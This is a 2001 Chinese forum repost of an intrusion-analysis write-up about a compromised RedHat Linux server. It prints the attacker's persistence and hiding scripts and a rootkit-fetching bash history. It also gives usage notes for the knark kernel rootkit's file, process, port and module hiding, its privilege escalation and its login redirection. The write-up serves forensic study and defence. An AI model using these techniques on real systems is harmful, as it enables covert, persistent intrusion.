论坛: 菜鸟乐园 标题: 入侵分析 复制本贴地址    
作者: dongh [dongh]    论坛用户   登录
                             入侵分析 
原始文档:http://www.xfocus.net/article_view.php?id=129 
原创:quack(quack) 
来源:http://www.xfocus.org 
 
by quack<quack@xfocus.org>  http://xfocus.org 

一、意外 

时间:2001-3-11下午 
地点:某台RedHat Linux机器: 
#uname -a 
Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown 
俺习惯性地先进到/etc/rc.d/init.d,看了一下,马上发现异状: 
#ls -la 
…… 
-rwxr-xr-x   1 root     root         2775 Mar 26  1999 netfs 
-rwxr-xr-x   1 root     root         5537 Mar  3 21:23 network 
-rwxr-xr-x   1 root     root         2408 Apr 16  1999 nfs 
……       

二、初步检查 

明显是个新手干的嘛,network文件被人动过了,咱们用stat命令看看先: 

#stat network 
  File: "network" 
  Size: 5537         Filetype: Regular File 
  Mode: (0755/-rwxr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root) 
Device:  3,1   Inode: 269454    Links: 1 
Access: Sun Mar 11 10:59:59 2001(00000.05:53:41) 
Modify: Sun Mar  4 05:23:41 2001(00007.11:29:59) 
Change: Sun Mar  4 05:23:41 2001(00007.11:29:59) 

最后被人改动的时间是3月4号的凌晨。让我们来看看他往文件里加了什么吧: 

#cat network 
…… 
/usr/lib/libdd.so.1 

就是这么一句,加在文件末尾,看来的确是手段不甚高明。瞧瞧这是个什么文件先 

#file /usr/lib/libdd.so.1 
/usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped 

哦,是个二进制的可执行文件,执行下strings看是否眼熟 :) 

#strings /usr/lib/libdd.so.1 
/lib/ld-linux.so.2 
__gmon_start__ 
libc.so.6 
system 
__deregister_frame_info 
_IO_stdin_used 
__libc_start_main 
__register_frame_info 
GLIBC_2.0 
PTRh 
/boot/.pty0/go.sh   <--------这条信息看上去比较有趣 

哦,这就简单了嘛,俺看看这里面的路径: 

#cd /boot/.pty0 
#cat go.sh 
#!/bin/bash 
f=`ls -al /boot | grep .pty0` 
if [ -n "$f" ]; then 
cd /boot/.pty0 
./mcd -q 
cd mech1 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 
cd mech2 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 
cd mech3 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 

/sbin/insmod paraport.o 1>/dev/null 2>/dev/null 
/sbin/insmod iBCS.o 1>/dev/null 2>/dev/null 
./ascunde.sh 
fi 
有点晕,看不明白mcd、mech这些东西是干嘛用的,再看一下下一个脚本是什么: 
#cat ascunde.sh 

#!/bin/bash 
for proces in `/bin/cat /boot/.pty0/hdm`; do 
P=`/sbin/pidof $proces` 
if [ -n "$P" ]; then 
killall -31 $proces 1>/dev/hdm 2>/dev/hdm 
fi 
done 
for port in `/bin/cat /boot/.pty0/hdm1`; do 
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm 
done 
for director in `/bin/cat /boot/.pty0/hdm2`; do 
./hidef $director 1>/dev/hdm 2>/dev/hdm 
done 

看到这里,事情开始有趣了,这似乎不是一个三流的script kiddle干的活嘛,打个包拖回来先,于是俺 

#cd /boot 
#ls -la 
total 2265 
drwxr-xr-x   3 root     root         1024 Mar 11 03:01 . 
drwxr-xr-x  21 root     root         1024 Mar  2 03:37 .. 
lrwxrwxrwx   1 root     root           19 Sep 26  1999 System.map -> System.map-2.2.5-15 
-rw-r--r--   1 root     root       186704 Apr 20  1999 System.map-2.2.5-15 
-rw-r--r--   1 root     root          512 Sep 26  1999 boot.0300 
-rw-r--r--   1 root     root         4544 Apr 13  1999 boot.b 
-rw-r--r--   1 root     root          612 Apr 13  1999 chain.b 
-rw-------   1 root     root         9728 Sep 26  1999 map 
lrwxrwxrwx   1 root     root           20 Sep 26  1999 module-info -> module-info-2.2.5-15 
-rw-r--r--   1 root     root        11773 Apr 20  1999 module-info-2.2.5-15 
-rw-r--r--   1 root     root          620 Apr 13  1999 os2_d.b 
-rwxr-xr-x   1 root     root      1469282 Apr 20  1999 vmlinux-2.2.5-15 
lrwxrwxrwx   1 root     root           16 Sep 26  1999 vmlinuz -> vmlinuz-2.2.5-15 
-rw-r--r--   1 root     root       617288 Apr 20  1999 vmlinuz-2.2.5-15 

咦,事情更有趣了……居然没有看到.pty0的目录 

#cd .pty0 
#ls -laF 
total 1228 
drwxr-xr-x   3 root     root         1024 Mar 11 03:01 ../ 
-rwxr-xr-x   1 root     root          345 Mar  3 21:23 ascunde.sh* 
-rwxr-xr-x   1 root     root        12760 Mar  3 21:23 dec2hex* 
-rwxr-xr-x   1 root     root        13414 Mar  3 21:23 ered* 
-rwxr-xr-x   1 root     root          358 Mar  7 19:03 go.sh* 
-rwxr-xr-x   1 root     root         3872 Mar  3 21:23 hidef* 
-rw-r--r--   1 root     root          956 Mar  3 21:23 iBCS.o 
-rw-r--r--   1 root     root       524107 Mar  7 18:40 m.tgz 
-rwxr-xr-x   1 root     root       656111 Mar  3 21:23 mcd* 
drwxr-xr-x   4 root     root         1024 Mar  7 19:00 mech1/ 
drwxr-xr-x   4 root     root         1024 Mar  9 19:50 mech2/ 
drwxr-xr-x   4 root     root         1024 Mar  9 19:20 mech3/ 
-rwxr-xr-x   1 root     root        12890 Mar  3 21:23 nethide* 
-rw-r--r--   1 root     root        10948 Mar  3 21:23 paraport.o 
-rw-r--r--   1 root     root          522 Mar  3 21:23 ssh_host_key 
-rw-------   1 root     root          512 Mar 11 04:16 ssh_random_seed 
-rw-r--r--   1 root     root          677 Mar  3 21:23 sshd_config 

看来是加载了某个lkm了,比较讨厌。 

#/sbin/lsmod 
Module                  Size  Used by 
nfsd                  150936   8  (autoclean) 
lockd                  30856   1  (autoclean) [nfsd] 
sunrpc                 52356   1  (autoclean) [nfsd lockd] 
3c59x                  18920   1  (autoclean) 

这些是正常的lkm么?前三个模块跟rpc有关,不知开了哪些rpc服务 

#/usr/sbin/rpcinfo -p localhost 
   program vers proto   port 
    100000    2   tcp    111  rpcbind 
    100024    1   tcp    664  status 
    100011    1   udp    673  rquotad 
    100005    3   tcp    695  mountd 
    100003    2   udp   2049  nfs 
    100021    3   tcp   1024  nlockmgr 

原来如此,难怪会被入侵,该开的全开了。不过也证明了nfsd,lockd,sunrpc这三个模块没问题了。 
再来看看网卡吧,3c59x是网卡的驱动模块。 

#/sbin/ifconfig -a 
/sbin/ifconfig -a 
lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0 
          UP LOOPBACK RUNNING  MTU:3924  Metric:1 
          RX packets:380640 errors:3374 dropped:0 overruns:0 
          TX packets:0 errors:0 dropped:0 overruns:380640 

eth0      Link encap:10Mbps Ethernet  HWaddr 00:10:5A:63:5B:05 
          inet addr:*.*.*.*  Bcast:*.*.*.255  Mask:255.255.255.0 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:71144611 errors:820101 dropped:0 overruns:0 
          TX packets:0 errors:0 dropped:0 overruns:436037129 
          Interrupt:10 Base address:0xe400 

#dmesg|grep eth0 
eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400,  00:10:5a:63:5b:05, IRQ 10 
eth0: Setting promiscuous mode. 
device eth0 entered promiscuous mode 

看来这些模块都是正常的,但比较狠的就是――device eth0 entered promiscuous mode――看来这入侵者架了sniffer开听了,但关键是现在这个入侵者加载了个俺看不到的家伙,有些晕了……咦,对了,看看文件名先…… 

三、模块介绍 

nethide?似乎有点印象……好吧,到俺的一堆破烂里找找……咦,找到一篇knark hacking的文章,里面有提到nethide,先当下一个来玩玩吧,有个版本号为knark-0.59的,是对Linux Kernel 2.2的,行……咱们先看看这是什么样的内核模块: 

除了taskhack.c之处,所有这些文件都是基于knark.o模块的正确加载。 

hidef 用来隐藏你的文件或者目录,你可以建立一个目录,比如/boot/.pty0,然后键入 
        ./hidef /boot/.pty0于是这这个目录便被隐藏起来,并且连du之类的命令也不能 
找出它来,同样的,子目录下的任何文件也一样地被藏得天衣无缝 :) 

ered 用来重定向执行某个程序,比如说,你把一个bindshell的程序拷到/boot/.pty0/bindshell, 
然后可以用./ered /bin/ls /boot/.pty0/bindshell这样的命令,将ls重定向到bindshell, 
当然,这样的话,ls是没变,但已经不能正确执行了。如果要清除所有的命令重定向,可以 
键入./ered -c 

nethide 用来隐藏/proc/net/tcp及/proc/net/udp里的连接进程――netstat就是从这里面获取信息并 
输出的,比如你要隐藏端口43981的连接信息,你必须键入: 
./nethide ":ABCD " 
你就可以象grep -v一样,过滤掉你不想让人看到的网络连接信息了,比如你用: 
netstat -at 
可能会有一行连接(ssh)的记录是这样的: 
Proto Recv-Q Send-Q Local Address      Foreign Address  State 
tcp        0      0 localhost:ssh      localhost:1023   ESTABLISHED 
我们来看看/proc/net/tcp里面的情况如何: 
cat /proc/net/tcp 
其中相应的行应该是这样的: 
  local_address rem_address   blablabla... 
0:0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000 
如果我们想隐藏关于127.0.0.1这个IP地址的所有信息,首先就必须把它“翻译”成这种格式,127用 
十六进制表示是7F,0是00,1是01,于是地址就是0100007F,然后,再跟上端口22是0016,就是: 
0100007F:0016了,于是我们键入: 
./nethide "0100007F:0016" 便可以将其隐藏得很漂亮了。 

rootme 利用这个家伙,你可以不需要suid位,就能拿到root的权限喽: 
./rootme /bin/sh 
你也可以用这种方式来运行: 
./rootme /bin/ls -l /root 
这里必须注意,要输入完整的路径名。 


taskhack 可以改变运行着的进程的uid,euid,gid,egid等。 
./taskhack -alluid=0 pid 
这可以把该进程所有的*uid(uid, euid, suid, fsuid)都改成0 
你用: 
ps aux | grep bash 
creed       91  0.0  1.3  1424   824   1 S    15:31   0:00 -bash 

rexec 远程执行命令,比如: 
./rexec www.microsoft.com haxored.server.nu /bin/touch /LUDER 


knark还有一些其它的特性: 
将信号31发送给某个进程,能够在/proc里将进程文件隐藏起来,这样ps及top 
都无法看到,比如: 
#kill -31 pid 
如果这个进程还有它的子进程,那么也将一同被隐藏起来,所以如果你把你的shell 
隐藏掉的话,所有你键入的进程将都是不可见的。如果你想再看看,被隐藏起来的进 
程藏在什么地方的话,可以看/proc/knark/pids文件,这里列出所有隐藏的家伙;) 

闯入一个系统中,sniffer总是入侵者们用来扩大战果的玩意儿,现在也存在许多小工具 
能够侦测到网卡是否被置于混杂模式,但如果你加载了这个模块,当人们在查询SIOCGIFFLAGS 
的标志位时,IFF_PROMISC――接口为随机(promiscuous)模式总是会被隐藏的。 

这个包中还带有另一个小工具modhide,这个模块加载后,可以将最后加载至系统中的模块从 
模块列表里移除――也就是/proc/module里面看不到它,示例如下: 
#/sbin/insmod knark.o 
#/sbin/lsmod | grep knark 
knark                   6640   0  (unused) 
#/sbin/insmod modhide.o 
#lsmod | grep knark 
啥也没有了 ;) 

最重要的是,我们可以在/proc/knark/目录――当然也是隐藏的――下面找到所有被藏起来的东西的资料。 

四、分析 

我们可以试着看看: 

#cd /proc/knark/ 
#cat files 
HIDDEN FILES 
/boot/.pty0       
/usr/lib/logem   

这两个目录就是被藏起来的了;) 

#cat nethides 
HIDDEN STRINGS (without the quotes) 
"CB0C" 
"17" 
":0947" 

这里是三个netstat的隐藏。 

#cat pids 
EUID PID       COMMAND 
    0 112       mcd 
    0 338       dittrich 

两个后门,一个bindshell,一个是伪装成ssh的,进程都被隐藏了。 

#cat redirects 
REDIRECT FROM                 REDIRECT TO 
/bin/login                    /usr/lib/logem/login2 

可执行程序重定向,这里是把login给重定向了。 

现在很清楚了,黑客进来之后,首先是上传上/usr/lib/logem下面的文件,包括几个脚本及刚才分析的内核模块,以及几个后门,如login后门,ssh后门,然后修改了/etc/rc.d/init.d/network文件,加上/usr/lib/libdd.so.1行,以便系统启动时自加载,(/etc/inetd.conf里也被加上了一句echo   stream  tcp nowait root  /usr/sbin/echod /usr/sbin/echod,这样入侵者可以远程启动后门及内核模块,这里的echod与libdd.so.1是同样文件),这个程序指向/boot/.pty0/go.sh: 

这里面启动了几个irc的cliend端,连到国外的一些server上挂着――我不太理解为啥老外都这样?我连上去whois了一下,结果如下: 

Coitze is ~statd@the.ip.of.the_hacked_machine * Ask your girlfriend :> 
Coitze on @#radio21pitesti @#mafiotzii 
Coitze using McLean.VA.US.Undernet.Org CAIS Internet, US 
Coitze End of /WHOIS list. 

而go.sh又指向ascunde.sh,这里是这样的: 

for proces in `/bin/cat /boot/.pty0/hdm`; do <-------hdm文件里有ncd、sh、mcd三行,也就是有这些东西是入侵者想隐藏的 
P=`/sbin/pidof $proces` 
if [ -n "$P" ]; then 
killall -31 $proces 1>/dev/hdm 2>/dev/hdm <-------发出kill -31的信号,调用加载的内核模块隐藏进程 
fi 
done 
for port in `/bin/cat /boot/.pty0/hdm1`; do  <--------hdm1里是51980及7,入侵者想隐藏的端口 
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm <------dec2hex是一个小程序,把十进制数据转换成16进制 
done 
for director in `/bin/cat /boot/.pty0/hdm2`; do <--------hdm2里是/boot/.pty0及/usr/lib/logem 
./hidef $director 1>/dev/hdm 2>/dev/hdm  <------调用hidef将hdm2里的文件隐藏 
done 

基本上就是这样了,我们看看这个洋鬼子在/usr/lib/logem/下面放了些什么东西吧 :) 

#ls -la 
drwxr-xr-x   4 quack  wheel    512 Mar 12 15:05 ./ 
drwxr-xr-x  10 quack  wheel   1536 Mar 12 08:44 ../ 
-rw-r--r--   1 quack  wheel    202 Feb 28 00:46 .bashrc 
-rw-r--r--   1 quack  wheel    295 Feb 28 00:46 autoexec 
-rwxr-xr-x   1 quack  wheel  14460 Feb 28 00:46 dittrich* 
drwxr-xr-x   2 quack  wheel    512 Feb 28 00:46 knrk/ 
-rwsr-xr-x   1 quack  wheel  20164 Feb 28 00:46 login2* 
-rwxr-xr-x   1 quack  wheel  25284 Feb 28 00:46 portmap* 
drwxr-xr-x   2 quack  wheel    512 Feb 28 00:46 stuff/ 

knrk就是咱们刚才分析的内核模块编译过的版本。 

#cat autoexec 
#!/bin/sh 
/sbin/insmod -f /usr/lib/logem/knrk/knrk.o 
/sbin/insmod -f /usr/lib/logem/knrk/knrkmodhide.o 
/usr/lib/logem/knrk/knrkhidef /usr/lib/logem 
/usr/lib/logem/knrk/knrkered /bin/login /usr/lib/logem/login2 
/usr/lib/logem/knrk/knrknethide ":0947" 
/usr/lib/logem dittrich 
killall -31 dittrich 

这里dittrich及portmap都是弹出shell的后门,而login2是一个假的login,只是这里这个家伙似乎对ered的理解有些问题,把/bin/login直接重定向到/usr/lib/logem/login2,会导致所有人登陆不上,因为运行login的时候,直接跑去run login2程序了――另外,这台机器没开telnet,root都从控制台登陆的,也不知这个入侵者是什么意思,或许是写了脚本自己入侵的吧。 

#cat stuff/conn 
# Root Connector (or something) 

if ! test $5; then 
  echo "Syntax: conn <rewtline>" 
  exit 1 
fi 

REWTIP=$3 
REWTPASS=$5 

echo "Connecting..." 
export DISPLAY=$REWTPASS 
telnet $REWTIP 
export DISPLAY=0 
echo "Disconnected" 

这是一个直接登陆到被放置login后门机器的脚本。 

五、抓鬼 

分析清楚了,还不够,咱得试着逮住这家伙才好呀,反正他的后门已经都知道了,咱们直接运行iplog之类的程序,就可以搞定它了,到http://download.sourceforge.net/ojnk/iplog-2.2.3.tar.gz下载iplog的最新版本,需要有libpcap的支持,编译后,借用这家伙的模块,直接kill -31 iplog's_pid,就把iplog进程隐藏了,等他上来吧 ;) 只要逮着连端口7或者51980的,估计都是bad guys :) 

六、后话 

其实这台机器,俺仔细地看了看,除了上面分析的家伙,至少还有两个人登陆过,而且取得了root权限并安装后门、sniffer等等,从下面可以看出来: 

1、/etc/rc.d/rc.local 
#!/bin/sh 

# This script will be executed *after* all the other init scripts. 
# You can put your own initialization stuff in here if you don't 
# want to do the full Sys V style init stuff. 
/bin/bd                      <--------------这里是一个bindshell的后门 

if [ -f /etc/redhat-release ]; then 
    R=$(cat /etc/redhat-release) 

    arch=$(uname -m) 
    a="a" 
    case "_$arch" in 
            _a*) a="an";; 
            _i*) a="an";; 
    esac 

    /usr/bin/bsgd            <--------------另一个bindshell后门 
    # This will overwrite /etc/issue at every boot.  So, make any changes you 
    # want to make to /etc/issue here or you will lose them when you reboot. 
    echo "" > /etc/issue 
    echo "$R" >> /etc/issue 
    echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue 
    /usr/bin/hyme            <---------------一个很常见的linux下的sniffer,该入侵者修改过程序 

    cp -f /etc/issue /etc/issue.net 
    echo >> /etc/issue 
fi 

2、/.bash_history 

#cat /.bash_history 
mkdir /usr/src/.puta 
cd /usr/src/.puta 
lynx -dump http://www.angelfire.com/linux/tools/bkS.tgz > bkS.tgz 
tar -zxvf bkS.tgz 
cd bk ;./b0skit 
cat /etc/inetd.conf | grep -v 4512 > /tmp/back 
mv -f /tmp/back /etc/inetd.conf 
killall -1 inetd 

其实作为系统管理员,只要付出1%的努力,就可以让99%的入侵者束手无策,但是满世界却偏偏总有着无数的机器,愿意Free地让入侵者们使用――或者删除……  
 
发布时间:2001年03月14日04时 
阅读次数:3764 
 

--------------------------------------------------------------------------------
 


地主 发表时间: 03/15 14:07

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号